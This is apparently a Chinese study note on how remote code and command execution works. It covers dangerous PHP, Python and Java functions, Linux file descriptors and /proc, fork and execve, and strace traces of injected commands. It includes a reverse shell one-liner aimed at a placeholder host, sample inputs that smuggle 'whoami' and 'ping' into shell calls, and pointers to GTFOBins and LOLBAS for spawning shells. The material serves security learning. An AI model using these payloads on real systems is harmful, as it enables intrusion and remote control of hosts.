RCE-fork,system,execve

简单来讲:

数据流进入了控制流
紧紧抓住输入
不同数据层的交汇处,往往是漏洞点

远程代码执行

PHP

eval()
assert()
preg_repleace()
call_user_func()
call_user_func_array()
array_may() //为每一个元素应用回调函数

python

exec(String) # python代码动态执行
eval(string) # 返回表达式的活代码对象的值
execfile(string) # 从一个文件读取和执行文件

JAVA

貌似没执行代码的,是反序列化反射方式执行

远程命令执行

一般都是系统给用户提供的接口被利用;例如检查设备是ping通;

php

exec
passthru
proc_open
shell_exec
system

python

os.system
popen()
subprocess.call #执行参数提供的命令

java

Runtime.getRuntime.exec()
ProcessBuilder()

shell知识

【Shell多个命令间隔符号】https://www.jianshu.com/p/410cd35e642f

重定向

https://www.jianshu.com/p/70136d731ca0

command1 < cmd.txt 		# 将cmd.txt读出,作为command1的输入
command2 > output.txt	# 将command2执行后重定向到output.txt

fd & /proc

【linux fd是什么】https://www.php.cn/linux-491720.html

在linux中,fd全称“File descriptor”,中文名为“文件描述符”,它是内核为了高效管理这些已经被打开的文件所创建的一种索引;它其实是一个非负整数,用于指代被打开的文件,所有执行I/O操作的系统调用都通过文件描述符来实现。

我们知道在Linux系统中一切皆可以看成是文件,文件又可分为:普通文件、目录文件、链接文件和设备文件。在操作这些所谓的文件的时候,我们每操作一次就找一次名字,这会耗费大量的时间和效率。所以Linux中规定每一个文件对应一个索引,这样要操作文件的时候,我们直接找到索引就可以对其进行操作了。

$$ ---> linux下当前进程的pid
/proc  ---> linux伪文件系统  --> 进程相关的信息挂载在这里
	简单来说:用户和应用程序可以通过proc得到系统的信息,并可以改变内核的某些参数。

【Linux系统proc目录说明】https://zhuanlan.zhihu.com/p/378388389

查看pid 所有/proc信息

image-20221116180722592

在proc中查看当前pid的信息,ls -al /proc/$$

image-20221116182245112

在proc中,查看当前进程的fd

image-20221116182425404

0:标准输入:表示在/dev/pts/0这个设备中读取这个进程($$)的输入里(人话:输入是/dev/pts/0给的)
1:标准输出:表示将,将输出输出到/dev/pts/0中
2:标准错误:(没见过)

查看apache2的fd

image-20221116190947102

/dev/null是一个特殊的设备,是序设备
0 -> /dev/null:表示不允许输入
1 -> /dev/null:表示丢弃所有输出
2 —> 错误日志,指向错误输出,重定向到error.log文件
其它文件描述符可以看看标识
socket:与网络相关的(继续跟进可以知道和哪一个ip通信)
	https://blog.csdn.net/weixin_30794499/article/details/98981641
pipe:与管道相关

跟进查看ip地址(ip采取了小端存取)

image-20221116194555005

这个进行进制转码之后就是10进制了,需要进行大小端转换

【在线转换器】http://www.metools.info/other/ipconvert162.html

image-20221116215134484

image-20221116215207433

反弹shell

sh -i >& /dev/tcp/vps/port 0>&1
完整:sh -i 0,1>& /dev/tcp/vps/port 0>&1
0,1>& /dev/tcp/vps/port:将0,1重定向到/dev/tcp/vps/port
0>&1 将标准输入重定向到标准输出指向的这个设备
然后在这里就能看到socket了(截个图)

image-20221116200903257

linux进程的创建

简介fork和execve

linux区分用户态和内核态,用户态程序要进行所有动作、其实都是通过调用system call(系统调用syscall)向内核发起请求,最终在内核态执行完毕后才能得到返回。

系统调用跟用户自定义函数一样也是一个函数,不同的是系统调用运行在内核态,而用户自定义函数运行在用户态。由于某些指令(如设置时钟、关闭/打开中断和I/O操作等)只能运行在内核态,所以操作系统必须提供一种能够进入内核态的方式,系统调用就是这样的一种机制。

【linux syscall系统调用原理及实现】https://blog.csdn.net/yanbw/article/details/123076039

【Linux控制流:fork和execve】https://blog.csdn.net/qq_33369979/article/details/109172295

fork,复制

execve,转变(变身)

image-20221116203241973

image-20221116203359542

bash -c "sleep 5"

image-20221116204009360

其中
22586是执行的sleep的进程号
22579是创建的bash的进程号

进程创建动作:

bash(pid:22579)-->sys_fork
	-->bash(22586)--sys_execve(通俗叫“变身”)-->/bin/sleep
这里出现的两个bash除了进程号pid不同之外,其他都相同;只有经过sys_execve之后,才算是真正编程了sleep

系统进程工具strace

概念:

https://zhuanlan.zhihu.com/p/517938702

https://www.cnblogs.com/AloneSword/p/3451121.html?utm_medium=referral&utm_source=debugrun

123.php
<?php
$name = '123456";whomai;echo "123';
$cmd = 'echo "HELLO'.$name.'"';
system($name);
?>

strace -tt -f -e trace=process php 123.php

image-20221116213849062

看前4个就行
php(pid:1)--->fork(clone一次)
		-->execve-->/bin/sh -c $input--> fork
				-->execve-->/bin/whoami
需要注意的是回调bash -c这个命令

会调用sh -c的
PHP
	system()
	exec()
	shell_exec()
	popen()
	proc_open()

为什么sh -c这么被关注?

就例如,ls,whoami,管道符,fd,等命令,符号都是shell中的,需要使用bash才能够执行,所以需要使用有一个sh -c来启动一个bash来执行这些命令。

c/php/python下的system()/popen()函数

代码是system($input$)的时候

实际执行执行 sh -c '$input'
可以转换为:
bash(pid:1)-->sys_fork
	-->bash(pid:2)-->sys_execve-->/bin/whoami(pid:2)

python的subprocess.call函数

区别:

python01.py
import os
import subprocess

if __name__ == "__main__":
    name = '123";ping www.baidu.com -c 100;echo "456'
    cmd = 'echo "HELLO' + name + '"'
    subprocess.call(cmd,shell = True)


python02.py
import os
import subprocess

if __name__ == "__main__":
    name = '123";ping baidu.com -c 100;echo "456'
    cmd = ['echo','"HELLO' + name + '"']
    subprocess.call(cmd,shell=False)

python01.py结果

image-20221116220228095

python01.py 从结果看:
python --> fork
	-->python2-->execve-->sh --> fork
			-->sh2-->execve--->ping
下边还有几个ping包

python02.py结果

image-20221116221409414

从结果来看:
在进程中查看echo命令,一直遍历文件,但是没有遍历到,于是返回上一次进行遍历,直到找到/usr/bin/echo能够执行命令;
并且将后面数组当做echo的参数来执行,由于echo不支持shell命令和shell语法,所以无法执行数组中的参数
于是没有RCE

image-20221116205715802

这个代码是否能rce?

main.java
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
public class main {
    public static void main(String[] args) {
        try {
            String name = "123';ping baidu.com -c 3;echo '456";
            String cmd = "echo 'HELLO " + name + "'";
            Process pro = Runtime.getRuntime().exec(cmd);
            InputStream in = null;
            in = pro.getInputStream();
            BufferedReader read = new BufferedReader(new InputStreamReader(in));

            String result = read.readLine();
            System.out.println("INFO:"+result);
        } 
        catch (IOException e) {
            throw new RuntimeException(e);
        }
    }
}

结果

image-20221116223132496

就从结果而言;
和之前那个不能执行的一样的原因

小总结

system
如果是执行system函数,或者类似system函数,他们都是直接走的fork-->execve流程(调用外
部sh -c),这种情况下,我们的输入被拼接加入到作为bash -c的参数,而bash -c是支持shell
语法的,所以我们能够很轻易的进行拼接、绕过,这种也是最常⻅的RCE攻击
execve
比如Runtime.getRuntime().exec()和subprocess.call(cmd, shell=False)这两者,走的流程
是直接execve,在这种情况下,此输入只能作为固定进程的参数

但是可以考虑遇到了execve类型的,考虑用下面网址的命令起bash,他们有能起bash的

linux:https://gtfobins.github.io/
windows:https://lolbas-project.github.io/#

image-20221116230726779

image-20221116230739331

题外话:

在主机安全产品edr中,如果黑客进来了,执行了命令:

查看命令:history(容易被绕过)

使用pre_load .so 做hook,拿到黑客的输入的命令,但是不能够拿到输出;

sandbox 蜜罐产品(某些)

使用gun bash ----编译一个bash

bash创建一个子进程----->bash(子进程也是bash)

用子进程bash做标准输入存一份,再将输入流转给bash做标准输入,再将bash的标准输出存一份之后输出。